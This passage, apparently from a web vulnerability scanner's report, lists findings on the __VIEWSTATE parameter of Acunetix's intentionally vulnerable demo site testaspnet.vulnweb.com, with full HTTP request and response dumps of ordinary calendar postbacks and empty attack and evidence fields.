malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8268&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBASRcIg9oIZGRkkHiFhNT9lJRf1eqqm3er5id3Cjw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5iOm%2BAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DjUtHbnVZG%2FmTt%2F%2FR6lnl4HURYlU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:15 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBASRcIg9oIZGRkkHiFhNT9lJRf1eqqm3er5id3Cjw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5iOm+AQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DjUtHbnVZG/mTt//R6lnl4HURYlU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:White" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8256&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAVBqaedoIZGRkV9HllINNaGr6xP%2BDwwBJcILV868%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLk3qaaDwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D6nXkkAY9KnDVg0DKDKEnxDgaSrs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:19 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAVBqaedoIZGRkV9HllINNaGr6xP+DwwBJcILV868=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLk3qaaDwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D6nXkkAY9KnDVg0DKDKEnxDgaSrs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:White" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not 